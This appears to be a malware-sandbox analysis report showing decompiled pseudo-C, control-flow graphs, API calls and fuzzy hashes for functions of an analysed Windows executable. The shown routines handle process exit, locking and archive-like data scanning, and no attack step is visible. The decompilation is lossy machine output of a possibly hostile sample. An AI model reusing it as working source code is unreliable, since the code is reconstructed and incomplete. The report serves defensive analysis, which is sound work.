                                          control_flow_graph 1074 416cb8-416cc7 call 416d5d 1077 416cc9-416cd4 GetCurrentProcess TerminateProcess 1074->1077 1078 416cda-416cf0 1074->1078 1077->1078 1079 416cf2-416cf9 1078->1079 1080 416d2e-416d42 call 416d6f 1078->1080 1082 416cfb-416d07 1079->1082 1083 416d1d-416d2d call 416d6f 1079->1083 1089 416d44-416d4a call 416d66 1080->1089 1090 416d4b-416d55 ExitProcess 1080->1090 1086 416d09-416d0d 1082->1086 1087 416d1c 1082->1087 1083->1080 1091 416d11-416d1a 1086->1091 1092 416d0f 1086->1092 1087->1083 1091->1086 1091->1087 1092->1091
                                          C-Code - Quality: 80%
                                          			E00416CB8(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E00416D5D();
				_t23 = 1;
				_t27 =  *0x423400 - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x4233fc = _t23;
				 *0x4233f8 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x425a10; // 0x7704c8
					if(_t9 != 0) {
						_t22 =  *0x425a0c; // 0x7704d0
						_push(_t24);
						_t4 = _t22 - 4; // 0x7704cc
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x425a10; // 0x7704c8
							} while (_t32 >= 0);
						}
					}
					E00416D6F(0x420044, 0x420048);
				}
				E00416D6F(0x42004c, 0x420054);
				if(_t16 == 0) {
					 *0x423400 = _t23; // executed
					ExitProcess(_a4);
				}
				return E00416D66();
			}












                                          0x00416cb8
                                          0x00416cb9
                                          0x00416cc0
                                          0x00416cc1
                                          0x00416cc7
                                          0x00416cd4
                                          0x00416cd4
                                          0x00416ce0
                                          0x00416ce4
                                          0x00416cea
                                          0x00416cf0
                                          0x00416cf2
                                          0x00416cf9
                                          0x00416cfb
                                          0x00416d01
                                          0x00416d02
                                          0x00416d02
                                          0x00416d07
                                          0x00416d09
                                          0x00416d09
                                          0x00416d0d
                                          0x00416d0f
                                          0x00416d0f
                                          0x00416d11
                                          0x00416d14
                                          0x00416d14
                                          0x00416d09
                                          0x00416d1c
                                          0x00416d27
                                          0x00416d2d
                                          0x00416d38
                                          0x00416d42
                                          0x00416d4f
                                          0x00416d55
                                          0x00416d55
                                          0x00416d4a

                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CCD
                                          • TerminateProcess.KERNEL32(00000000,?,00416CA3,?,00000000,00000000,00414BED,00000000,00000000), ref: 00416CD4
                                          • ExitProcess.KERNEL32 ref: 00416D55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                                          • Instruction ID: 207b1b8771569bb39d21ff3be241c2a042127402aedffa1bc22b33ac5a943006
                                          • Opcode Fuzzy Hash: 88460fada53f43c142527d69cfd7889c6f43d20f3130cd5a4fa53c970b5b43b0
                                          • Instruction Fuzzy Hash: 7A01C4323002119BD630AF69FC86A9A7BA5FB41715BA2802FF45057151DB7CD8C28B5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407093 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1095 407093-4070c7 call 413954 EnterCriticalSection call 4065b2 1099 4070c9-4070d7 call 406505 1095->1099 1100 4070da-4070f2 LeaveCriticalSection 1095->1100 1099->1100
                                          C-Code - Quality: 100%
                                          			E00407093(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				E00413954(E00419874, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                                          0x00407098
                                          0x0040709f
                                          0x004070a2
                                          0x004070a6
                                          0x004070a9
                                          0x004070af
                                          0x004070b5
                                          0x004070c2
                                          0x004070c7
                                          0x004070cc
                                          0x004070d7
                                          0x004070d7
                                          0x004070dd
                                          0x004070ea
                                          0x004070f2

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00407098
                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070A9
                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00407122,?,?,?,?,?), ref: 004070DD
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterH_prologLeave
                                          • String ID:
                                          • API String ID: 367238759-0
                                          • Opcode ID: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                          • Instruction ID: a56bdc6fde0de93627b634a906b5586fd045a2fb55df8f4462ae58feb39c4b8d
                                          • Opcode Fuzzy Hash: 0cda8505b6e8737534b09afe540dc97e47590bc95c9c3e0b1678985bbac2a5b2
                                          • Instruction Fuzzy Hash: D7018176A00204EFCB118F94CC08B9ABBB5FF48715F00841AFD12E7250C3B4A910CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040DD8B Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 156COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1103 40dd8b-40ddb0 call 413954 call 40776f 1108 40ddb6-40ddbf call 40df2c 1103->1108 1109 40df1b-40df29 1103->1109 1112 40ddc1-40ddc3 1108->1112 1113 40ddc8-40ddfe call 4076d5 call 414090 1108->1113 1112->1109 1118 40de01-40de06 1113->1118 1119 40de25-40de47 call 406505 1118->1119 1120 40de08-40de15 1118->1120 1127 40df07 1119->1127 1128 40de4d-40de55 1119->1128 1121 40decb-40dece 1120->1121 1122 40de1b 1120->1122 1123 40df09-40df19 call 403a9c 1121->1123 1122->1119 1124 40de1d-40de1f 1122->1124 1123->1109 1124->1119 1124->1121 1127->1123 1128->1121 1130 40de57-40de5b 1128->1130 1130->1119 1131 40de5d-40de6d 1130->1131 1132 40dec6-40dec9 1131->1132 1133 40de6f 1131->1133 1134 40deaa-40dec1 call 413980 1132->1134 1135 40de77 1133->1135 1134->1118 1136 40de7a-40de7e 1135->1136 1138 40de80-40de82 1136->1138 1139 40de8a 1136->1139 1141 40de84-40de88 1138->1141 1142 40de8c 1138->1142 1139->1142 1141->1136 1142->1134 1143 40de8e-40de97 call 40df2c 1142->1143 1146 40ded0-40df04 call 414090 call 4065b2 1143->1146 1147 40de99-40dea2 1143->1147 1146->1127 1149 40de71-40de74 1147->1149 1150 40dea4-40dea7 1147->1150 1149->1135 1150->1134
                                          C-Code - Quality: 95%
                                          			E0040DD8B(void* __ecx, void* __eflags) {
				intOrPtr _t57;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr* _t75;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr _t85;
				intOrPtr _t93;
				void* _t95;
				void* _t98;
				intOrPtr* _t100;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr* _t111;
				void* _t113;
				intOrPtr _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t121;

				E00413954(E0041A630, _t116);
				_t119 = _t118 - 0x20;
				_t113 = __ecx;
				_t83 = __ecx + 0x28;
				_t107 = 0x20;
				_t57 = E0040776F(__eflags, _t107); // executed
				if(_t57 == 0) {
					if(E0040DF2C(_t83) == 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
						 *((intOrPtr*)(_t116 - 0x28)) = 0;
						 *((intOrPtr*)(_t116 - 0x24)) = 0;
						 *((intOrPtr*)(_t116 - 4)) = 0;
						E004076D5(_t116 - 0x2c, 0x10000);
						 *((intOrPtr*)(_t116 - 0x18)) =  *((intOrPtr*)(_t116 - 0x24));
						 *((intOrPtr*)(_t116 - 0x10)) = _t107;
						E00414090( *((intOrPtr*)(_t116 - 0x24)), _t83, _t107);
						_t109 =  *((intOrPtr*)(_t113 + 0x20));
						_t85 =  *((intOrPtr*)(_t113 + 0x24));
						_t121 = _t119 + 0xc;
						while(1) {
							L4:
							_t100 =  *((intOrPtr*)(_t116 + 0xc));
							__eflags = _t100;
							if(_t100 == 0) {
								goto L8;
							}
							_t95 = _t109 -  *((intOrPtr*)(_t113 + 0x20));
							asm("sbb eax, [esi+0x24]");
							__eflags = _t85 -  *((intOrPtr*)(_t100 + 4));
							if(__eflags > 0) {
								L25:
								_t115 = 1;
							} else {
								if(__eflags < 0) {
									goto L8;
								} else {
									__eflags = _t95 -  *_t100;
									if(_t95 >  *_t100) {
										goto L25;
									} else {
										while(1) {
											L8:
											_t65 =  *((intOrPtr*)(_t116 - 0x10));
											_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 8)))) + 0xc))( *((intOrPtr*)(_t116 + 8)), _t65 +  *((intOrPtr*)(_t116 - 0x18)), 0x10000 - _t65, _t116 - 0x20);
											__eflags = _t67;
											if(_t67 != 0) {
												break;
											}
											_t69 =  *((intOrPtr*)(_t116 - 0x20));
											 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) + _t69;
											__eflags = _t69;
											if(_t69 == 0) {
												goto L25;
											} else {
												__eflags =  *((intOrPtr*)(_t116 - 0x10)) - 0x20;
												if( *((intOrPtr*)(_t116 - 0x10)) <= 0x20) {
													continue;
												} else {
													_t104 = 0;
													_t71 =  *((intOrPtr*)(_t116 - 0x10)) + 0xffffffe0;
													 *((intOrPtr*)(_t116 - 0x14)) = 0;
													__eflags = _t71;
													 *((intOrPtr*)(_t116 - 0x1c)) = _t71;
													if(_t71 <= 0) {
														_t93 =  *((intOrPtr*)(_t116 - 0x18));
														goto L23;
													} else {
														while(1) {
															_t93 =  *((intOrPtr*)(_t116 - 0x18));
															while(1) {
																L15:
																__eflags =  *((char*)(_t104 + _t93)) - 0x37;
																if( *((char*)(_t104 + _t93)) == 0x37) {
																	break;
																}
																__eflags = _t104 - _t71;
																if(__eflags < 0) {
																	_t104 = _t104 + 1;
																	 *((intOrPtr*)(_t116 - 0x14)) = _t104;
																	continue;
																}
																L19:
																if(__eflags == 0) {
																	L23:
																	_t109 = _t109 + _t71;
																	asm("adc ebx, 0x0");
																	 *((intOrPtr*)(_t116 - 0x10)) =  *((intOrPtr*)(_t116 - 0x10)) - _t71;
																	E00413980(_t93, _t71 + _t93,  *((intOrPtr*)(_t116 - 0x10)));
																	_t121 = _t121 + 0xc;
																	goto L4;
																} else {
																	_t75 = E0040DF2C(_t93 + _t104);
																	__eflags = _t75;
																	if(_t75 != 0) {
																		E00414090(_t113 + 0x28,  *((intOrPtr*)(_t116 - 0x14)) +  *((intOrPtr*)(_t116 - 0x18)), 0x20);
																		_t110 = _t109 +  *((intOrPtr*)(_t116 - 0x14));
																		_t80 =  *((intOrPtr*)(_t116 + 8));
																		 *((intOrPtr*)(_t113 + 0x20)) = _t110;
																		_t98 = 0;
																		asm("adc ebx, ecx");
																		_t111 = _t110 + 0x20;
																		__eflags = _t111;
																		 *((intOrPtr*)(_t113 + 0x24)) = _t85;
																		asm("adc ebx, ecx");
																		_t67 =  *((intOrPtr*)( *_t80 + 0x10))(_t80, _t111, _t85, _t98, _t98);
																		goto L27;
																	} else {
																		 *((intOrPtr*)(_t116 - 0x14)) =  *((intOrPtr*)(_t116 - 0x14)) + 1;
																		__eflags =  *((intOrPtr*)(_t116 - 0x14)) -  *((intOrPtr*)(_t116 - 0x1c));
																		if( *((intOrPtr*)(_t116 - 0x14)) <  *((intOrPtr*)(_t116 - 0x1c))) {
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			_t104 =  *((intOrPtr*)(_t116 - 0x14));
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			continue;
																		} else {
																			_t93 =  *((intOrPtr*)(_t116 - 0x18));
																			_t71 =  *((intOrPtr*)(_t116 - 0x1c));
																			goto L23;
																		}
																	}
																}
																goto L28;
															}
															__eflags = _t104 - _t71;
															goto L19;
														}
													}
												}
											}
											goto L28;
										}
										L27:
										_t115 = _t67;
									}
								}
							}
							L28:
							 *((intOrPtr*)(_t116 - 0x2c)) = 0x41b818;
							E00403A9C( *((intOrPtr*)(_t116 - 0x24)));
							_t57 = _t115;
							goto L29;
						}
					} else {
						_t57 = 0;
					}
				}
				L29:
				 *[fs:0x0] =  *((intOrPtr*)(_t116 - 0xc));
				return _t57;
			}



























                                          0x0040dd90
                                          0x0040dd95
                                          0x0040dd9b
                                          0x0040dda2
                                          0x0040dda5
                                          0x0040dda9
                                          0x0040ddb0
                                          0x0040ddbf
                                          0x0040ddc8
                                          0x0040ddca
                                          0x0040ddd1
                                          0x0040ddd4
                                          0x0040dddf
                                          0x0040dde2
                                          0x0040dded
                                          0x0040ddf0
                                          0x0040ddf3
                                          0x0040ddf8
                                          0x0040ddfb
                                          0x0040ddfe
                                          0x0040de01
                                          0x0040de01
                                          0x0040de01
                                          0x0040de04
                                          0x0040de06
                                          0x00000000
                                          0x00000000
                                          0x0040de0c
                                          0x0040de0f
                                          0x0040de12
                                          0x0040de15
                                          0x0040decb
                                          0x0040decd
                                          0x0040de1b
                                          0x0040de1b
                                          0x00000000
                                          0x0040de1d
                                          0x0040de1d
                                          0x0040de1f
                                          0x00000000
                                          0x0040de25
                                          0x0040de25
                                          0x0040de25
                                          0x0040de33
                                          0x0040de42
                                          0x0040de45
                                          0x0040de47
                                          0x00000000
                                          0x00000000
                                          0x0040de4d
                                          0x0040de50
                                          0x0040de53
                                          0x0040de55
                                          0x00000000
                                          0x0040de57
                                          0x0040de57
                                          0x0040de5b
                                          0x00000000
                                          0x0040de5d
                                          0x0040de60
                                          0x0040de62
                                          0x0040de65
                                          0x0040de68
                                          0x0040de6a
                                          0x0040de6d
                                          0x0040dec6
                                          0x00000000
                                          0x0040de6f
                                          0x0040de77
                                          0x0040de77
                                          0x0040de7a
                                          0x0040de7a
                                          0x0040de7a
                                          0x0040de7e
                                          0x00000000
                                          0x00000000
                                          0x0040de80
                                          0x0040de82
                                          0x0040de84
                                          0x0040de85
                                          0x00000000
                                          0x0040de85
                                          0x0040de8c
                                          0x0040de8c
                                          0x0040deaa
                                          0x0040deaa
                                          0x0040deac
                                          0x0040deaf
                                          0x0040deb9
                                          0x0040debe
                                          0x00000000
                                          0x0040de8e
                                          0x0040de90
                                          0x0040de95
                                          0x0040de97
                                          0x0040dedf
                                          0x0040dee7
                                          0x0040deea
                                          0x0040deef
                                          0x0040def2
                                          0x0040def3
                                          0x0040def5
                                          0x0040def5
                                          0x0040def8
                                          0x0040deff
                                          0x0040df04
                                          0x00000000
                                          0x0040de99
                                          0x0040de99
                                          0x0040de9f
                                          0x0040dea2
                                          0x0040de71
                                          0x0040de74
                                          0x0040de77
                                          0x00000000
                                          0x0040dea4
                                          0x0040dea4
                                          0x0040dea7
                                          0x00000000
                                          0x0040dea7
                                          0x0040dea2
                                          0x0040de97
                                          0x00000000
                                          0x0040de8c
                                          0x0040de8a
                                          0x00000000
                                          0x0040de8a
                                          0x0040de77
                                          0x0040de6d
                                          0x0040de5b
                                          0x00000000
                                          0x0040de55
                                          0x0040df07
                                          0x0040df07
                                          0x0040df07
                                          0x0040de1f
                                          0x0040de1b
                                          0x0040df09
                                          0x0040df0c
                                          0x0040df13
                                          0x0040df19
                                          0x00000000
                                          0x0040df19
                                          0x0040ddc1
                                          0x0040ddc1
                                          0x0040ddc1
                                          0x0040ddbf
                                          0x0040df1b
                                          0x0040df21
                                          0x0040df29

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-3916222277
                                          • Opcode ID: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                          • Instruction ID: cf89379ab294d4739916b9706e3dd1d7b183837ff3903d8a06049ba810aa014c
                                          • Opcode Fuzzy Hash: 74d497e127491c222f436ed49dfb2d2edc1529cc02750c3a0fcf17e54ab28a3b
                                          • Instruction Fuzzy Hash: 19515E71E006069BDB14DFA9C881ABFB7B5EF98304F14853AE405BB381D778A9458BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403113 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1154 403113-40313f call 413954 call 402ee1 call 405841 1161 403141-403156 call 401d1b 1154->1161 1162 403158-40315d 1154->1162 1168 4031b9-4031c1 call 403a9c 1161->1168 1164 403167 1162->1164 1165 40315f-403165 1162->1165 1167 40316a-4031a9 call 4032a8 call 408f0a call 4042ad 1164->1167 1165->1167 1179 4031c6-4031e8 call 401ce1 call 405d0b call 4049dd 1167->1179 1180 4031ab-4031b4 call 401d1b 1167->1180 1174 403298 1168->1174 1176 403299-4032a7 1174->1176 1188 40322a-40327f call 401c80 call 402685 call 403a9c 1179->1188 1189 4031ea-403228 call 409569 call 401d7a call 403a9c * 3 1179->1189 1180->1168 1211 403281 call 40c231 1188->1211 1212 403281 call 40bbc9 1188->1212 1189->1176 1204 403284-403297 call 403a9c * 2 1204->1174 1211->1204 1212->1204
                                          C-Code - Quality: 95%
                                          			E00403113(intOrPtr* __ecx, void* __eflags) {
				void* _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr _t73;
				intOrPtr* _t82;
				void* _t85;
				void* _t87;
				void* _t121;
				void* _t124;
				intOrPtr _t126;
				intOrPtr* _t129;
				void* _t131;

				E00413954(E004192B0, _t131);
				_t129 = __ecx;
				E00402EE1(_t131 - 0x40);
				_push( *((intOrPtr*)(__ecx + 4)));
				 *((intOrPtr*)(_t131 - 4)) = 0;
				_t63 = E00405841(_t131 - 0x68, _t121); // executed
				if(_t63 != 0) {
					_t64 =  *((intOrPtr*)(__ecx + 0x1c));
					__eflags = _t64;
					if(_t64 == 0) {
						 *((intOrPtr*)(_t131 - 0x10)) = 0;
					} else {
						 *((intOrPtr*)(_t131 - 0x10)) = _t64 + 4;
					}
					E004032A8(_t131 - 0x30, 4);
					 *((intOrPtr*)(_t131 - 0x30)) = 0x41b378;
					_t126 = _t129 + 0x28;
					 *((char*)(_t131 - 4)) = 1;
					_t68 = E00408F0A(_t126,  *_t129, _t131 - 0x30, 0, 0, _t129 + 4,  *((intOrPtr*)(_t131 - 0x10))); // executed
					 *((intOrPtr*)(_t129 + 0x60)) = _t68;
					 *((char*)(_t131 - 4)) = 0;
					E004042AD(_t131 - 0x30);
					__eflags =  *((intOrPtr*)(_t129 + 0x60));
					if( *((intOrPtr*)(_t129 + 0x60)) == 0) {
						E00401CE1(_t131 - 0x1c, _t129 + 0x10);
						 *((char*)(_t131 - 4)) = 2;
						E00405D0B(_t131 - 0x1c);
						_t73 = E004049DD( *((intOrPtr*)(_t131 - 0x1c))); // executed
						__eflags = _t73;
						if(__eflags != 0) {
							E00401C80(_t131 - 0x28, L"Default");
							 *((char*)(_t131 - 4)) = 4;
							E00402685( *((intOrPtr*)(_t129 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4)))), _t131 - 0x1c, _t131 - 0x28, _t131 - 0x50, 0);
							 *((char*)(_t131 - 4)) = 2;
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							_t82 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0xc)) +  *(_t126 + 8) * 4 - 4))));
							 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)( *_t82 + 0x1c))(_t82, 0, 0xffffffff, 0,  *((intOrPtr*)(_t129 + 0x20)));
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
							goto L11;
						} else {
							_push(_t131 - 0x1c);
							_t124 = 9;
							_t87 = E00409569(_t131 - 0x28, _t124, __eflags);
							 *((char*)(_t131 - 4)) = 3;
							E00401D7A(_t129 + 0x64, _t87);
							E00403A9C( *((intOrPtr*)(_t131 - 0x28)));
							 *((intOrPtr*)(_t129 + 0x60)) = 0x80004005;
							E00403A9C( *((intOrPtr*)(_t131 - 0x1c)));
							_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
						}
					} else {
						E00401D1B(_t129 + 0x64,  *0x420320);
						goto L7;
					}
				} else {
					E00401D1B(__ecx + 0x64,  *0x42031c);
					 *((intOrPtr*)(__ecx + 0x60)) = 0x80004005;
					L7:
					_t85 = E00403A9C( *((intOrPtr*)(_t131 - 0x40)));
					L11:
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t131 - 0xc));
				return _t85;
			}















                                          0x00403118
                                          0x00403122
                                          0x00403128
                                          0x0040312d
                                          0x00403135
                                          0x00403138
                                          0x0040313f
                                          0x00403158
                                          0x0040315b
                                          0x0040315d
                                          0x00403167
                                          0x0040315f
                                          0x00403162
                                          0x00403162
                                          0x0040316f
                                          0x00403174
                                          0x00403181
                                          0x00403184
                                          0x00403193
                                          0x0040319b
                                          0x0040319e
                                          0x004031a1
                                          0x004031a6
                                          0x004031a9
                                          0x004031cd
                                          0x004031d5
                                          0x004031d9
                                          0x004031e1
                                          0x004031e6
                                          0x004031e8
                                          0x00403232
                                          0x0040323e
                                          0x00403258
                                          0x00403260
                                          0x00403264
                                          0x00403279
                                          0x00403287
                                          0x0040328a
                                          0x00403292
                                          0x00000000
                                          0x004031ea
                                          0x004031f0
                                          0x004031f3
                                          0x004031f4
                                          0x004031fd
                                          0x00403201
                                          0x00403209
                                          0x00403211
                                          0x00403218
                                          0x00403220
                                          0x00403225
                                          0x004031ab
                                          0x004031b4
                                          0x00000000
                                          0x004031b4
                                          0x00403141
                                          0x0040314a
                                          0x0040314f
                                          0x004031b9
                                          0x004031bc
                                          0x00403298
                                          0x00403298
                                          0x0040329f
                                          0x004032a7

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00403118
                                            • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                            • Part of subcall function 004049DD: __EH_prolog.LIBCMT ref: 004049E2
                                            • Part of subcall function 00409569: __EH_prolog.LIBCMT ref: 0040956E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: Default
                                          • API String ID: 3519838083-753088835
                                          • Opcode ID: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                          • Instruction ID: 6c236086827897a16f525891fa60e3e62c5941a793998487ad20a929e2e28791
                                          • Opcode Fuzzy Hash: f128adbc8c60b4baaeff554b123c1f0edecf7e5f5aa4d41d76fe55222fded7d1
                                          • Instruction Fuzzy Hash: 76516071900609EFCB10EFA5D8859EEBBB8FF08318F00456FE45277291DB38AA05CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402F15 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 85%
                                          			E00402F15(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _t57;
				void* _t73;
				intOrPtr _t90;
				void* _t109;
				intOrPtr _t115;
				intOrPtr _t116;
				void* _t118;

				E00413954(E00419269, _t118);
				 *((char*)( *((intOrPtr*)(_t118 + 0x10)))) = 0;
				E00403376(_t118 - 0x94);
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x94)) = __ecx;
				E00401D7A(_t118 - 0x90, __edx);
				E00401D7A(_t118 - 0x84,  *((intOrPtr*)(_t118 + 8)));
				_push(0xf0);
				_t90 = E00403A76();
				 *((intOrPtr*)(_t118 + 8)) = _t90;
				 *(_t118 - 4) = 1;
				if(_t90 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = E004034E3(_t90);
				}
				 *(_t118 - 4) = 0;
				 *((intOrPtr*)(_t118 - 0x78)) = _t57;
				E0040640D(_t118 - 0x74, _t57);
				if( *((intOrPtr*)(_t118 + 0xc)) == 0) {
					E00403113(_t118 - 0x94, __eflags);
					goto L8;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)(_t118 - 0x78)) + 0xd8)) = 1;
					 *((intOrPtr*)(_t118 + 0xc)) = 0;
					 *(_t118 - 4) = 2;
					_t116 = E00413220(_t118 + 0xc, E004032E1, _t118 - 0x94);
					if(_t116 == 0) {
						 *((intOrPtr*)(_t118 - 0x18)) = 0;
						 *((intOrPtr*)(_t118 - 0x14)) = 0;
						 *((intOrPtr*)(_t118 - 0x10)) = 0;
						E00402170(_t118 - 0x18, 3);
						_t109 = 0x45;
						 *(_t118 - 4) = 3;
						_t73 = E0040602F(_t109);
						 *(_t118 - 4) = 4;
						E00401D7A(_t118 - 0x18, _t73);
						 *(_t118 - 4) = 3;
						E00403A9C( *((intOrPtr*)(_t118 - 0x24)));
						_push(_t118 + 0xc);
						_push(_t118 - 0x18);
